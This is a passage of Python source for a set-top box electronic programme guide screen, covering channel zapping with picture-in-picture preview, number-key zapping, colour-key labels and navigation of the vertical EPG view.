    """Zap (or preview, prev=True) the service under the cursor.

    In infobar preview mode '2' the preview is played in a PiP window
    instead of replacing the live service.
    """
    currservice = self.session.nav.getCurrentlyPlayingServiceReference() and str(self.session.nav.getCurrentlyPlayingServiceReference().toString()) or None
    if self.session.pipshown and config.usage.pip_mode.value == "standard":
        self.prevch = self.session.pip.getCurrentService() and str(self.session.pip.getCurrentService().toString()) or None
    else:
        self.prevch = self.session.nav.getCurrentlyPlayingServiceReference() and str(self.session.nav.getCurrentlyPlayingServiceReference().toString()) or None
    lst = self["list"+str(self.activeList)]
    count = lst.getCurrentChangeCount()
    if count == 0:
        ref = lst.getCurrent()[1]
        if ref is None and self.type == EPG_TYPE_VERTICAL and self.myServices[0][0]:
            ref = ServiceReference(self.myServices[self["list"].getSelectionIndex()+self.activeList-1][0])
        if ref is not None:
            if (self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_preview_mode.value == '2':
                if not prev:
                    if self.session.pipshown:
                        self.session.pipshown = False
                        del self.session.pip
                    self.zapFunc(ref.ref, bouquet = self.getCurrentBouquet(), preview = False)
                    return
                if not self.session.pipshown:
                    self.session.pip = self.session.instantiateDialog(PictureInPicture)
                    self.session.pip.show()
                    self.session.pipshown = True
                # Allow a per-service PiP substitute service, if configured.
                n_service = self.pipServiceRelation.get(str(ref.ref), None)
                if n_service is not None:
                    service = eServiceReference(n_service)
                else:
                    service = ref.ref
                if self.currch == service.toString():
                    # Previewing the same service again: commit the zap.
                    if self.session.pipshown:
                        self.session.pipshown = False
                        del self.session.pip
                    self.zapFunc(ref.ref, bouquet = self.getCurrentBouquet(), preview = False)
                    return
                if self.prevch != service.toString() and currservice != service.toString():
                    self.session.pip.playService(service)
                    self.currch = self.session.pip.getCurrentService() and str(self.session.pip.getCurrentService().toString())
            else:
                self.zapFunc(ref.ref, bouquet = self.getCurrentBouquet(), preview = prev)
                self.currch = self.session.nav.getCurrentlyPlayingServiceReference() and str(self.session.nav.getCurrentlyPlayingServiceReference().toString())
            self['list'+str(self.activeList)].setCurrentlyPlaying(self.session.nav.getCurrentlyPlayingServiceOrGroup())
    if self.Oldpipshown:
        self.session.pipshown = True

def zapTo(self):
    """Preview-zap to the selected service; closes when re-pressed on the same service."""
    if self.session.nav.getCurrentlyPlayingServiceOrGroup() and '0:0:0:0:0:0:0:0:0' in self.session.nav.getCurrentlyPlayingServiceOrGroup().toString():
        #from Screens.InfoBarGenerics import setResumePoint
        #setResumePoint(self.session)
        return
    if self.zapFunc:
        self.zapSelectedService(True)
        self.refreshTimer.start(2000)
    if not self.currch or self.currch == self.prevch:
        if self.zapFunc:
            self.zapFunc(None, False)
            self.closeEventViewDialog()
            self.close('close')
        else:
            self.closeEventViewDialog()
            self.close()

def keyNumberGlobal(self, number):
    """Numeric key handler: view shortcuts on graph/vertical views, number-zap elsewhere."""
    if self.createTimer.isActive():
        return
    if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
        # Pick the config subtree for the graph vs. infobar-graph variant.
        if self.type == EPG_TYPE_GRAPH:
            now = time() - int(config.epgselection.graph_histminutes.value) * 60
            prevtimeperiod = config.epgselection.graph_prevtimeperiod
            roundto = config.epgselection.graph_roundto
            primetimehour = config.epgselection.graph_primetimehour
            primetimemins = config.epgselection.graph_primetimemins
        else:
            now = time() - int(config.epgselection.infobar_histminutes.value) * 60
            prevtimeperiod = config.epgselection.infobar_prevtimeperiod
            roundto = config.epgselection.infobar_roundto
            primetimehour = config.epgselection.infobar_primetimehour
            primetimemins = config.epgselection.infobar_primetimemins
        if number == 1:
            # Zoom in: show one hour less (minimum 60 minutes).
            timeperiod = int(prevtimeperiod.value)
            if timeperiod > 60:
                timeperiod -= 60
                self['list'].setEpoch(timeperiod)
                prevtimeperiod.setValue(timeperiod)
                self.moveTimeLines()
        elif number == 2:
            self.prevPage()
        elif number == 3:
            # Zoom out: show one hour more (maximum 300 minutes).
            timeperiod = int(prevtimeperiod.value)
            if timeperiod < 300:
                timeperiod += 60
                self['list'].setEpoch(timeperiod)
                prevtimeperiod.setValue(timeperiod)
                self.moveTimeLines()
        elif number == 4:
            self.updEvent(-2)
        elif number == 5:
            # Jump to "now", rounded down to the configured grid step.
            self.ask_time = now - now % (int(roundto.value) * 60)
            self['list'].resetOffset()
            self['list'].fillGraphEPG(None, self.ask_time, True)
            self.moveTimeLines(True)
        elif number == 6:
            self.updEvent(+2)
        elif number == 7 and self.type == EPG_TYPE_GRAPH:
            # Toggle the alternate row-height mode.
            if config.epgselection.graph_heightswitch.value:
                config.epgselection.graph_heightswitch.setValue(False)
            else:
                config.epgselection.graph_heightswitch.setValue(True)
            self['list'].setItemsPerPage()
            self['list'].fillGraphEPG(None)
            self.moveTimeLines()
        elif number == 8:
            self.nextPage()
        elif number == 9:
            # Jump to primetime (today, or tomorrow if it is already >1h past).
            basetime = localtime(self['list'].getTimeBase())
            basetime = (basetime[0], basetime[1], basetime[2], int(primetimehour.value), int(primetimemins.value), 0, basetime[6], basetime[7], basetime[8])
            self.ask_time = mktime(basetime)
            if self.ask_time + 3600 < time():
                self.ask_time += 86400
            self['list'].resetOffset()
            self['list'].fillGraphEPG(None, self.ask_time)
            self.moveTimeLines(True)
        elif number == 0:
            self.toTop()
            self.ask_time = now - now % (int(roundto.value) * 60)
            self['list'].resetOffset()
            self['list'].fillGraphEPG(None, self.ask_time, True)
            self.moveTimeLines()
    elif self.type == EPG_TYPE_VERTICAL:
        if number == 1:
            self.gotoFirst()
        elif number == 2:
            self.allUp()
        elif number == 3:
            self.gotoLast()
        elif number == 4:
            self.prevPage(True)
        elif number == 0:
            if self.zapFunc:
                self.closeScreen(True)
                self.onCreate()
        elif number == 6:
            self.nextPage(True)
        elif number == 7:
            self.gotoNow()
        elif number == 8:
            self.allDown()
        elif number == 9:
            self.gotoPrimetime()
        elif number == 5:
            self.setBasetime()
    else:
        # Other views: accumulate digits for number-zap; auto-commit after
        # 4 digits or when the 5s timer fires.
        self.zapnumberstarted = True
        self.NumberZapTimer.start(5000, True)
        if not self.NumberZapField:
            self.NumberZapField = str(number)
        else:
            self.NumberZapField += str(number)
        self.handleServiceName()
        self["number"].setText(self.zaptoservicename+'\n'+self.NumberZapField)
        self["number"].show()
        if len(self.NumberZapField) >= 4:
            self.dozumberzap()

def dozumberzap(self):
    """Commit the collected number-zap digits."""
    self.zapnumberstarted = False
    self.numberEntered(self.service, self.bouquet)

def handleServiceName(self):
    """Resolve the typed channel number to a service and cache its name."""
    if self.searchNumber:
        self.service, self.bouquet = self.searchNumber(int(self.NumberZapField))
        self.zaptoservicename = ServiceReference(self.service).getServiceName()

def numberEntered(self, service = None, bouquet = None):
    """Zap to *service* if the number lookup found one."""
    if service is not None:
        self.zapToNumber(service, bouquet)

def searchNumberHelper(self, serviceHandler, num, bouquet):
    """Return the service in *bouquet* with channel number *num*, or None."""
    servicelist = serviceHandler.list(bouquet)
    if servicelist is not None:
        serviceIterator = servicelist.getNext()
        while serviceIterator.valid():
            if num == serviceIterator.getChannelNum():
                return serviceIterator
            serviceIterator = servicelist.getNext()
    return None

def searchNumber(self, number):
    """Find (service, bouquet) for channel *number*, scanning all bouquets if enabled."""
    bouquet = self.servicelist.getRoot()
    service = None
    serviceHandler = eServiceCenter.getInstance()
    service = self.searchNumberHelper(serviceHandler, number, bouquet)
    if config.usage.multibouquet.value:
        service = self.searchNumberHelper(serviceHandler, number, bouquet)
        if service is None:
            # Not in the current bouquet: walk every bouquet directory.
            bouquet = self.servicelist.bouquet_root
            bouquetlist = serviceHandler.list(bouquet)
            if bouquetlist is not None:
                bouquet = bouquetlist.getNext()
                while bouquet.valid():
                    if bouquet.flags & eServiceReference.isDirectory:
                        service = self.searchNumberHelper(serviceHandler, number, bouquet)
                        if service is not None:
                            playable = not service.flags & (eServiceReference.isMarker | eServiceReference.isDirectory) or service.flags & eServiceReference.isNumberedMarker
                            if not playable:
                                service = None
                            break
                        if config.usage.alternative_number_mode.value:
                            break
                    bouquet = bouquetlist.getNext()
    return service, bouquet

def zapToNumber(self, service, bouquet):
    """Select *service* in the service list and rebuild the screen."""
    self["number"].hide()
    self.NumberZapField = None
    self.CurrBouquet = bouquet
    self.CurrService = service
    if service is not None:
        self.setServicelistSelection(bouquet, service)
    self.onCreate()

def RefreshColouredKeys(self):
    """Label the four colour keys from the per-view key-assignment settings.

    A value of None falls back to the historical default for that key
    (red=IMDb, green=timer, yellow=EPG search, blue=autotimer).
    """
    if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
        if config.epgselection.graph_red.value == "24plus":
            self['key_red'] = Button(_('+24'))
        elif config.epgselection.graph_red.value == "24minus":
            self['key_red'] = Button(_('-24'))
        elif config.epgselection.graph_red.value == "timer":
            self['key_red'] = Button(_('Add Timer'))
        elif config.epgselection.graph_red.value == "imdb" or config.epgselection.graph_red.value == None:
            self['key_red'] = Button(_('IMDb Search'))
        elif config.epgselection.graph_red.value == "autotimer":
            self['key_red'] = Button(_('Add AutoTimer'))
        elif config.epgselection.graph_red.value == "bouquetlist":
            self['key_red'] = Button(_('BouquetList'))
        elif config.epgselection.graph_red.value == "epgsearch":
            self['key_red'] = Button(_('EPG Search'))
        elif config.epgselection.graph_red.value == "showmovies":
            self['key_red'] = Button(_('Recordings'))
        elif config.epgselection.graph_red.value == "record":
            self['key_red'] = Button(_('Record'))
        elif config.epgselection.graph_red.value == "gotodatetime":
            self['key_red'] = Button(_('Goto Date/Time'))
        elif config.epgselection.graph_red.value == "nextpage" and self.type == EPG_TYPE_GRAPH:
            self['key_red'] = Button(_('Next page'))
        elif config.epgselection.graph_red.value == "prevpage" and self.type == EPG_TYPE_GRAPH:
            self['key_red'] = Button(_('Previous page'))
        elif config.epgselection.graph_red.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH:
            self['key_red'] = Button(_('Next bouquet'))
        elif config.epgselection.graph_red.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH:
            self['key_red'] = Button(_('Previous bouquet'))
        if config.epgselection.graph_green.value == "24plus":
            self['key_green'] = Button(_('+24'))
        elif config.epgselection.graph_green.value == "24minus":
            self['key_green'] = Button(_('-24'))
        elif config.epgselection.graph_green.value == "timer" or config.epgselection.graph_green.value == None:
            self['key_green'] = Button(_('Add Timer'))
        elif config.epgselection.graph_green.value == "imdb":
            self['key_green'] = Button(_('IMDb Search'))
        elif config.epgselection.graph_green.value == "autotimer":
            self['key_green'] = Button(_('Add AutoTimer'))
        elif config.epgselection.graph_green.value == "bouquetlist":
            self['key_green'] = Button(_('BouquetList'))
        elif config.epgselection.graph_green.value == "epgsearch":
            self['key_green'] = Button(_('EPG Search'))
        elif config.epgselection.graph_green.value == "showmovies":
            self['key_green'] = Button(_('Recordings'))
        elif config.epgselection.graph_green.value == "record":
            self['key_green'] = Button(_('Record'))
        elif config.epgselection.graph_green.value == "gotodatetime":
            self['key_green'] = Button(_('Goto Date/Time'))
        elif config.epgselection.graph_green.value == "nextpage" and self.type == EPG_TYPE_GRAPH:
            self['key_green'] = Button(_('Next page'))
        elif config.epgselection.graph_green.value == "prevpage" and self.type == EPG_TYPE_GRAPH:
            self['key_green'] = Button(_('Previous page'))
        elif config.epgselection.graph_green.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH:
            self['key_green'] = Button(_('Next bouquet'))
        elif config.epgselection.graph_green.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH:
            self['key_green'] = Button(_('Previous bouquet'))
        if config.epgselection.graph_yellow.value == "24plus":
            self['key_yellow'] = Button(_('+24'))
        elif config.epgselection.graph_yellow.value == "24minus":
            self['key_yellow'] = Button(_('-24'))
        elif config.epgselection.graph_yellow.value == "timer":
            self['key_yellow'] = Button(_('Add Timer'))
        elif config.epgselection.graph_yellow.value == "imdb":
            self['key_yellow'] = Button(_('IMDb Search'))
        elif config.epgselection.graph_yellow.value == "autotimer":
            self['key_yellow'] = Button(_('Add AutoTimer'))
        elif config.epgselection.graph_yellow.value == "bouquetlist":
            self['key_yellow'] = Button(_('BouquetList'))
        elif config.epgselection.graph_yellow.value == "epgsearch" or config.epgselection.graph_yellow.value == None:
            self['key_yellow'] = Button(_('EPG Search'))
        elif config.epgselection.graph_yellow.value == "showmovies":
            self['key_yellow'] = Button(_('Recordings'))
        elif config.epgselection.graph_yellow.value == "record":
            self['key_yellow'] = Button(_('Record'))
        elif config.epgselection.graph_yellow.value == "gotodatetime":
            self['key_yellow'] = Button(_('Goto Date/Time'))
        elif config.epgselection.graph_yellow.value == "nextpage" and self.type == EPG_TYPE_GRAPH:
            self['key_yellow'] = Button(_('Next page'))
        elif config.epgselection.graph_yellow.value == "prevpage" and self.type == EPG_TYPE_GRAPH:
            self['key_yellow'] = Button(_('Previous page'))
        elif config.epgselection.graph_yellow.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH:
            self['key_yellow'] = Button(_('Next bouquet'))
        elif config.epgselection.graph_yellow.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH:
            self['key_yellow'] = Button(_('Previous bouquet'))
        if config.epgselection.graph_blue.value == "24plus":
            self['key_blue'] = Button(_('+24'))
        elif config.epgselection.graph_blue.value == "24minus":
            self['key_blue'] = Button(_('-24'))
        elif config.epgselection.graph_blue.value == "timer":
            self['key_blue'] = Button(_('Add Timer'))
        elif config.epgselection.graph_blue.value == "imdb":
            self['key_blue'] = Button(_('IMDb Search'))
        elif config.epgselection.graph_blue.value == "autotimer" or config.epgselection.graph_blue.value == None:
            self['key_blue'] = Button(_('Add AutoTimer'))
        elif config.epgselection.graph_blue.value == "bouquetlist":
            self['key_blue'] = Button(_('BouquetList'))
        elif config.epgselection.graph_blue.value == "epgsearch":
            self['key_blue'] = Button(_('EPG Search'))
        elif config.epgselection.graph_blue.value == "showmovies":
            self['key_blue'] = Button(_('Recordings'))
        elif config.epgselection.graph_blue.value == "record":
            self['key_blue'] = Button(_('Record'))
        elif config.epgselection.graph_blue.value == "gotodatetime":
            self['key_blue'] = Button(_('Goto Date/Time'))
        elif config.epgselection.graph_blue.value == "nextpage" and self.type == EPG_TYPE_GRAPH:
            self['key_blue'] = Button(_('Next page'))
        elif config.epgselection.graph_blue.value == "prevpage" and self.type == EPG_TYPE_GRAPH:
            self['key_blue'] = Button(_('Previous page'))
        elif config.epgselection.graph_blue.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH:
            self['key_blue'] = Button(_('Next bouquet'))
        elif config.epgselection.graph_blue.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH:
            self['key_blue'] = Button(_('Previous bouquet'))
    elif self.type == EPG_TYPE_VERTICAL:
        if config.epgselection.vertical_red.value == "24plus":
            self['key_red'] = Button(_('+24'))
        elif config.epgselection.vertical_red.value == "24minus":
            self['key_red'] = Button(_('-24'))
        elif config.epgselection.vertical_red.value == "timer":
            self['key_red'] = Button(_('Add Timer'))
        elif config.epgselection.vertical_red.value == "imdb" or config.epgselection.vertical_red.value == None:
            self['key_red'] = Button(_('IMDb Search'))
        elif config.epgselection.vertical_red.value == "autotimer":
            self['key_red'] = Button(_('Add AutoTimer'))
        elif config.epgselection.vertical_red.value == "bouquetlist":
            self['key_red'] = Button(_('BouquetList'))
        elif config.epgselection.vertical_red.value == "epgsearch":
            self['key_red'] = Button(_('EPG Search'))
        elif config.epgselection.vertical_red.value == "showmovies":
            self['key_red'] = Button(_('Recordings'))
        elif config.epgselection.vertical_red.value == "record":
            self['key_red'] = Button(_('Record'))
        elif config.epgselection.vertical_red.value == "gotoprimetime":
            self['key_red'] = Button(_('Goto Primetime'))
        elif config.epgselection.vertical_red.value == "setbasetime":
            self['key_red'] = Button(_('Set Basetime'))
        elif config.epgselection.vertical_red.value == "gotodatetime":
            self['key_red'] = Button(_('Goto Date/Time'))
        if config.epgselection.vertical_green.value == "24plus":
            self['key_green'] = Button(_('+24'))
        elif config.epgselection.vertical_green.value == "24minus":
            self['key_green'] = Button(_('-24'))
        elif config.epgselection.vertical_green.value == "timer" or config.epgselection.vertical_green.value == None:
            self['key_green'] = Button(_('Add Timer'))
        elif config.epgselection.vertical_green.value == "imdb":
            self['key_green'] = Button(_('IMDb Search'))
        elif config.epgselection.vertical_green.value == "autotimer":
            self['key_green'] = Button(_('Add AutoTimer'))
        elif config.epgselection.vertical_green.value == "bouquetlist":
            self['key_green'] = Button(_('BouquetList'))
        elif config.epgselection.vertical_green.value == "epgsearch":
            self['key_green'] = Button(_('EPG Search'))
        elif config.epgselection.vertical_green.value == "showmovies":
            self['key_green'] = Button(_('Recordings'))
        elif config.epgselection.vertical_green.value == "record":
            self['key_green'] = Button(_('Record'))
        elif config.epgselection.vertical_green.value == "gotoprimetime":
            self['key_green'] = Button(_('Goto Primetime'))
        elif config.epgselection.vertical_green.value == "setbasetime":
            self['key_green'] = Button(_('Set Basetime'))
        elif config.epgselection.vertical_green.value == "gotodatetime":
            self['key_green'] = Button(_('Goto Date/Time'))
        if config.epgselection.vertical_yellow.value == "24plus":
            self['key_yellow'] = Button(_('+24'))
        elif config.epgselection.vertical_yellow.value == "24minus":
            self['key_yellow'] = Button(_('-24'))
        elif config.epgselection.vertical_yellow.value == "timer":
            self['key_yellow'] = Button(_('Add Timer'))
        elif config.epgselection.vertical_yellow.value == "imdb":
            self['key_yellow'] = Button(_('IMDb Search'))
        elif config.epgselection.vertical_yellow.value == "autotimer":
            self['key_yellow'] = Button(_('Add AutoTimer'))
        elif config.epgselection.vertical_yellow.value == "bouquetlist":
            self['key_yellow'] = Button(_('BouquetList'))
        elif config.epgselection.vertical_yellow.value == "epgsearch" or config.epgselection.vertical_yellow.value == None:
            self['key_yellow'] = Button(_('EPG Search'))
        elif config.epgselection.vertical_yellow.value == "showmovies":
            self['key_yellow'] = Button(_('Recordings'))
        elif config.epgselection.vertical_yellow.value == "record":
            self['key_yellow'] = Button(_('Record'))
        elif config.epgselection.vertical_yellow.value == "gotoprimetime":
            self['key_yellow'] = Button(_('Goto Primetime'))
        elif config.epgselection.vertical_yellow.value == "setbasetime":
            self['key_yellow'] = Button(_('Set Basetime'))
        elif config.epgselection.vertical_yellow.value == "gotodatetime":
            self['key_yellow'] = Button(_('Goto Date/Time'))
        if config.epgselection.vertical_blue.value == "24plus":
            self['key_blue'] = Button(_('+24'))
        elif config.epgselection.vertical_blue.value == "24minus":
            self['key_blue'] = Button(_('-24'))
        elif config.epgselection.vertical_blue.value == "timer":
            self['key_blue'] = Button(_('Add Timer'))
        elif config.epgselection.vertical_blue.value == "imdb":
            self['key_blue'] = Button(_('IMDb Search'))
        elif config.epgselection.vertical_blue.value == "autotimer" or config.epgselection.vertical_blue.value == None:
            self['key_blue'] = Button(_('Add AutoTimer'))
        elif config.epgselection.vertical_blue.value == "bouquetlist":
            self['key_blue'] = Button(_('BouquetList'))
        elif config.epgselection.vertical_blue.value == "epgsearch":
            self['key_blue'] = Button(_('EPG Search'))
        elif config.epgselection.vertical_blue.value == "showmovies":
            self['key_blue'] = Button(_('Recordings'))
        elif config.epgselection.vertical_blue.value == "record":
            self['key_blue'] = Button(_('Record'))
        elif config.epgselection.vertical_blue.value == "gotoprimetime":
            self['key_blue'] = Button(_('Goto Primetime'))
        elif config.epgselection.vertical_blue.value == "setbasetime":
            self['key_blue'] = Button(_('Set Basetime'))
        elif config.epgselection.vertical_blue.value == "gotodatetime":
            self['key_blue'] = Button(_('Goto Date/Time'))

def setTimerButtonText(self, text = None):
    """Write *text* onto every colour key currently assigned to 'timer'."""
    if text == None:
        text = _("Add Timer")
    if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
        if config.epgselection.graph_red.value == 'timer':
            self["key_red"].setText(text)
        if config.epgselection.graph_green.value == 'timer':
            self["key_green"].setText(text)
        if config.epgselection.graph_yellow.value == 'timer':
            self["key_yellow"].setText(text)
        if config.epgselection.graph_blue.value == 'timer':
            self["key_blue"].setText(text)
    elif self.type == EPG_TYPE_VERTICAL:
        if config.epgselection.vertical_red.value == 'timer':
            self["key_red"].setText(text)
        if config.epgselection.vertical_green.value == 'timer':
            self["key_green"].setText(text)
        if config.epgselection.vertical_yellow.value == 'timer':
            self["key_yellow"].setText(text)
        if config.epgselection.vertical_blue.value == 'timer':
            self["key_blue"].setText(text)
    else:
        self['key_green'].setText(text)

def getChannels(self):
    """Build self.list / self.myServices from self.services and return the name list."""
    self.list = []
    self.myServices = []
    idx = 0
    for service in self.services:
        idx = idx + 1
        info = service.info()
        # Strip the DVB emphasis control bytes (0x86/0x87) from the name.
        servicename = info.getName(service.ref).replace('\xc2\x86', '').replace('\xc2\x87', '')
        self.list.append(str(idx) + ". " + servicename)
        self.myServices.append((service.ref.toString(), servicename))
    if not idx:
        # Keep both lists non-empty so index lookups stay valid.
        self.list.append('')
        self.myServices.append(('', ''))
    return self.list

def updateVerticalEPG(self, force = False):
    """Refill the up-to-five per-channel columns of the vertical EPG view."""
    self.displayActiveEPG()
    stime = None
    now = time()
    if force or self.ask_time >= now - config.epg.histminutes.value*60:
        stime = self.ask_time
    prgIndex = self["list"].getSelectionIndex()
    CurrentPrg = self.myServices[prgIndex]
    x = len(self.list)-1
    if x >= 0 and CurrentPrg[0]:
        self["list1"].show()
        self["currCh1"].setText(str(CurrentPrg[1]))
        l = self["list1"]
        l.recalcEntrySize()
        myService = ServiceReference(CurrentPrg[0])
        self["piconCh1"].newService(myService.ref)
        l.fillSingleEPG(myService, stime)
    else:
        self["Active1"].hide()
        self["piconCh1"].newService(None)
        self["currCh1"].setText(str(" "))
        self["list1"].hide()
    prgIndex = prgIndex + 1
    if prgIndex < (x+1):
        self["list2"].show()
        CurrentPrg = self.myServices[prgIndex]
        self["currCh2"].setText(str(CurrentPrg[1]))
        l = self["list2"]
        l.recalcEntrySize()
        myService = ServiceReference(CurrentPrg[0])
        self["piconCh2"].newService(myService.ref)
        l.fillSingleEPG(myService, stime)
    else:
        self["piconCh2"].newService(None)
        self["currCh2"].setText(str(" "))
        self["list2"].hide()
    prgIndex = prgIndex + 1
    if prgIndex < (x+1):
        self["list3"].show()
        CurrentPrg = self.myServices[prgIndex]
        self["currCh3"].setText(str(CurrentPrg[1]))
        l = self["list3"]
        l.recalcEntrySize()
        myService = ServiceReference(CurrentPrg[0])
        self["piconCh3"].newService(myService.ref)
        l.fillSingleEPG(myService, stime)
    else:
        self["piconCh3"].newService(None)
        self["currCh3"].setText(str(" "))
        self["list3"].hide()
    if self.Fields == 6:
        # Wide layout: two extra columns.
        prgIndex = prgIndex + 1
        if prgIndex < (x+1):
            self["list4"].show()
            CurrentPrg = self.myServices[prgIndex]
            self["currCh4"].setText(str(CurrentPrg[1]))
            l = self["list4"]
            l.recalcEntrySize()
            myService = ServiceReference(CurrentPrg[0])
            self["piconCh4"].newService(myService.ref)
            l.fillSingleEPG(myService, stime)
        else:
            self["piconCh4"].newService(None)
            self["currCh4"].setText(str(" "))
            self["piconCh4"].newService(None)
            self["list4"].hide()
        prgIndex = prgIndex + 1
        if prgIndex < (x+1):
            self["list5"].show()
            CurrentPrg = self.myServices[prgIndex]
            self["currCh5"].setText(str(CurrentPrg[1]))
            l = self["list5"]
            l.recalcEntrySize()
            myService = ServiceReference(CurrentPrg[0])
            self["piconCh5"].newService(myService.ref)
            l.fillSingleEPG(myService, stime)
        else:
            self["piconCh5"].newService(None)
            self["currCh5"].setText(str(" "))
            self["list5"].hide()
    else:
        self["currCh4"].setText(str(" "))
        self["list4"].hide()
        self["Active4"].hide()
        self["currCh5"].setText(str(" "))
        self["list5"].hide()
        self["Active5"].hide()

def displayActiveEPG(self):
    """Highlight the active column; others follow the event-marker setting."""
    marker = config.epgselection.vertical_eventmarker.value
    for list in range(1, self.Fields):
        if list == self.activeList:
            self["list"+str(list)].selectionEnabled(True)
            self["Active"+str(list)].show()
        else:
            self["Active"+str(list)].hide()
            self["list"+str(list)].selectionEnabled(marker)

def getActivePrg(self):
    """Return the service index of the active vertical column."""
    return self["list"].getSelectionIndex()+(self.activeList-1)

def allUp(self):
    """Page every vertical column up one page, keeping columns time-synced."""
    if self.getEventTime(self.activeList)[0] is None:
        return
    idx = self['list'+str(self.activeList)].getCurrentIndex()
    if not idx:
        # Already at the top: pull in an earlier time window first.
        tmp = self.lastEventTime
        self.setMinus24h(True, 6)
        self.lastEventTime = tmp
        self.gotoLasttime()
    for list in range(1, self.Fields):
        self['list'+str(list)].moveTo(self['list'+str(list)].instance.pageUp)
    self.syncUp(idx)
    self.saveLastEventTime()

def syncUp(self, idx):
    """Nudge the non-active columns up until they reach the active column's time."""
    # NOTE(review): inner-loop nesting reconstructed from statement order.
    idx = self['list'+str(self.activeList)].getCurrentIndex()
    curTime = self.getEventTime(self.activeList)[0]
    for list in range(1, self.Fields):
        if list == self.activeList:
            continue
        for x in range(0, int(idx/config.epgselection.vertical_itemsperpage.value)):
            evTime = self.getEventTime(list)[0]
            if curTime is None or evTime is None or curTime <= evTime:
                self['list'+str(list)].moveTo(self['list'+str(list)].instance.pageUp)
            evTime = self.getEventTime(list)[0]
            if curTime is None or evTime is None or curTime >= evTime:
                break

def syncDown(self, idx):
    """Nudge the non-active columns down until they reach the active column's time."""
    # NOTE(review): inner-loop nesting reconstructed from statement order.
    curTime = self.getEventTime(self.activeList)[0]
    for list in range(1, self.Fields):
        if list == self.activeList:
            continue
        for x in range(0, int(idx/config.epgselection.vertical_itemsperpage.value)):
            evTime = self.getEventTime(list)[0]
            if curTime is None or evTime is None or curTime >= evTime:
                self['list'+str(list)].moveTo(self['list'+str(list)].instance.pageDown)
            evTime = self.getEventTime(list)[0]
            if curTime is None or evTime is None or curTime <= evTime:
                break

def allDown(self):
    """Page every vertical column down one page, then re-sync them."""
    if self.getEventTime(self.activeList)[0] is None:
        return
    for list in range(1, self.Fields):
        self['list'+str(list)].moveTo(self['list'+str(list)].instance.pageDown)
    idx = self['list'+str(self.activeList)].getCurrentIndex()
    self.syncDown(idx)
    self.saveLastEventTime()

def gotoNow(self):
    """Jump the vertical view to the current time."""
    self.ask_time = time()
    self.updateVerticalEPG()
    self.saveLastEventTime()

def gotoFirst(self):
    """Jump to the first channel, first column."""
    self["list"].moveToIndex(0)
    self.activeList = 1
    self.updateVerticalEPG()

def gotoLast(self):
    """Jump to the last channel (last page, matching column)."""
    idx = len(self.list)
    page = idx/(self.Fields-1)
    row = idx%(self.Fields-1)
    if row:
        self.activeList = row
    else:
        page -= 1
        self.activeList = self.Fields-1
    self["list"].moveToIndex(0)
    for i in range(0, page):
        self["list"].pageDown()
    self.updateVerticalEPG()

def setPrimetime(self, stime):
    """Return the primetime timestamp on the same day as *stime* (now if None)."""
    if stime is None:
        stime = time()
    t = localtime(stime)
    primetime = mktime((t[0], t[1], t[2], config.epgselection.vertical_primetimehour.value, config.epgselection.vertical_primetimemins.value, 0, t[6], t[7], t[8]))
    return primetime

def findMaxEventTime(self, stime):
    """True if the active column's last event starts at or after *stime* (cursor restored)."""
    curr = self['list'+str(self.activeList)].getSelectedEventId()
    self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveEnd)
    maxtime = self.getEventTime(self.activeList)[0]
    self['list'+str(self.activeList)].moveToEventId(curr)
    return maxtime is not None and maxtime >= stime

def findMinEventTime(self, stime):
    """True if the active column's first event starts at or before *stime* (cursor restored)."""
    curr = self['list'+str(self.activeList)].getSelectedEventId()
    self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveTop)
    mintime = self.getEventTime(self.activeList)[0]
    self['list'+str(self.activeList)].moveToEventId(curr)
    return mintime is not None and mintime <= stime

def isInTimeRange(self, stime):
    """True if *stime* lies inside the active column's loaded event range."""
    return self.findMaxEventTime(stime) and self.findMinEventTime(stime)

def setPlus24h(self):
    """Shift the vertical view 24 hours forward (prefers primetime anchoring)."""
    oneDay = 24*3600
    ev_begin, ev_end = self.getEventTime(self.activeList)
    if ev_begin is not None:
        if self.findMaxEventTime(ev_begin+oneDay):
            primetime = self.setPrimetime(ev_begin)
            if primetime >= ev_begin and primetime < ev_end:
                self.ask_time = primetime + oneDay
            else:
                self.ask_time = ev_begin + oneDay
            self.updateVerticalEPG()
        else:
            # No data that far ahead: just jump to the end of the list.
            self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveEnd)
        self.saveLastEventTime()

def setMinus24h(self, force = False, daypart = 1):
    """Shift the vertical view back by 24h/daypart hours (clamped to now)."""
    now = time()
    oneDay = 24*3600/daypart
    if not self.lastMinus:
        self.lastMinus = oneDay
    ev_begin, ev_end = self.getEventTime(self.activeList)
    if ev_begin is not None:
        if ev_begin - oneDay < now:
            # Would go into the past: -1 means "load from now".
            self.ask_time = -1
        else:
            if self['list'+str(self.activeList)].getCurrentIndex() and not force and self.findMinEventTime(ev_begin - oneDay):
                self.lastEventTime = ev_begin - oneDay, ev_end - oneDay
                self.gotoLasttime()
                return
            else:
                pt = 0
                if self.ask_time == ev_begin - self.lastMinus:
                    # Repeated press: double the step.
                    self.lastMinus += self.lastMinus
                else:
                    primetime = self.setPrimetime(ev_begin)
                    if primetime >= ev_begin and primetime < ev_end:
                        self.ask_time = pt = primetime - oneDay
                    self.lastMinus = oneDay
                if not pt:
                    self.ask_time = ev_begin - self.lastMinus
        self.updateVerticalEPG()
        self.saveLastEventTime()

def setBasetime(self):
    """Make the selected event's start time the view's base time."""
    ev_begin, ev_end = self.getEventTime(self.activeList)
    if ev_begin is not None:
        self.ask_time = ev_begin
        self.updateVerticalEPG()

def gotoPrimetime(self):
    """Jump the vertical view to primetime (yesterday/today/tomorrow as available)."""
    idx = 0
    now = time()
    oneDay = 24*3600
    if self.firststart:
        self.ask_time = self.setPrimetime(now)
